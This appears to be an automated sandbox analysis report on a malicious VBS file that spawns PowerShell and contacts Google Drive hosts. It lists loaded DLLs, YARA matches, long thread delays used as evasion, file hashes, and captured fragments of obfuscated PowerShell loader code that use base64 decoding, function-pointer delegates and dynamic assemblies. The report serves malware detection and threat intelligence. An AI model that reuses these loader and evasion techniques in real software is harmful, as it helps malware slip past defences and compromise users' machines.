Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: Yara match	File source: 0000000D.00000002.2666861261.000000000632B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2708061147.00000247F39E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Blyantstegninger)$global:Prvekrt = [System.Text.Encoding]::ASCII.GetString($Skimmet)$global:Berceau=$Prvekrt.substring($Forblndede,$Antisiphon)<#Autogamies brnefdselsdagene Footlike
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((udkrsel $Periodically174 $Skelstene), (Variabeltypen @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Endelighederne = [AppDomain]::CurrentDomain.GetAssembl
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Ao)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Eftersnakkens, $false).DefineType($Kiltens, $Gothersga
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: FromBase64String($Blyantstegninger)$global:Prvekrt = [System.Text.Encoding]::ASCII.GetString($Skimmet)$global:Berceau=$Prvekrt.substring($Forblndede,$Antisiphon)<#Autogamies brnefdselsdagene Footlike

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 9_2_00007FFB4AF45479 push ebp; iretd	9_2_00007FFB4AF45538
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_0500EC78 pushfd ; retf	13_2_0500EC79
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_07E7CB18 pushfd ; retf	13_2_07E7CD26

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5197	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4729	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5813	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4031	Jump to behavior

Source: C:\Windows\System32\wscript.exe TID: 7668	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2396	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4200	Thread sleep count: 5813 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4452	Thread sleep count: 4031 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2112	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior

Source: wscript.exe, 00000000.00000003.1392277797.0000023822D68000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1391500820.0000023822DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1392029985.0000023822DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1396822089.0000023822D65000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1392096367.0000023822D41000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1396594042.0000023822DCB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.1391500820.0000023822DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1392029985.0000023822DCB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1396594042.0000023822DCB000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW~*
Source: powershell.exe, 00000009.00000002.2715037329.00000247FBF02000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: Yara match	File source: amsi64_1296.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 1296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 3552, type: MEMORYSTR

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.250.186.78	drive.google.com	United States		15169	GOOGLEUS	false
142.250.186.161	drive.usercontent.google.com	United States		15169	GOOGLEUS	false

Name	IP	Active
drive.google.com	142.250.186.78	true
drive.usercontent.google.com	142.250.186.161	true
windowsupdatebg.s.llnwi.net	87.248.204.0	true

ID:	1466659
Product:	CloudBasic
Start time:	08:51:56
Start date:	03.07.2024
Sample:	2669976595_366408723_KHI_SOF_240702_0957_P.vbs
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	8a1a3c704c957d6638e61b5d4e4814a2
SHA1:	800fcc7219cab666231b2fc8c9fd7463160be8db
SHA256:	11a67ec7519d527b1351ba13a36ea0ef91b38a1be0c0d27dafdc9884c57a4894
Filetype:	Visual Basic Script (13500/0) 100.00%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression	49AEBF8CBD62D92AC215B2923FB1B9F5	1723BE06719828DDA65AD804298D0431F6AFF976	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	data	4A30EF1B7F26B7CDAA89400AEF673C33	4107D209D55D7F3B8C00CB793854B06FC03084AC	D464B22843452D1AF0957BE4165EEC8FF51DCAB8DD17685293363AD66089F293
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k3yfehvc.v3c.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lf4slyuy.rhq.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lsjybhop.hxc.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xygt1gtw.iip.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Roaming\Noncongestion.For	ASCII text, with very long lines (65536), with no line terminators	3A600DDCB6AB98E95B160AD99169DEC5	BEBC0A51DCE59B7D4187EDCE4911550F3A3694F5	928225A9CFE9A6210B4F2993337B881F73C95EEAE938C1FA2D5C78EA27FE13E9

Windows Analysis Report 2669976595_366408723_KHI_SOF_240702_0957_P.vbs

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Windows Analysis Report
2669976595_366408723_KHI_SOF_240702_0957_P.vbs

Malware Threat Intel
Provided by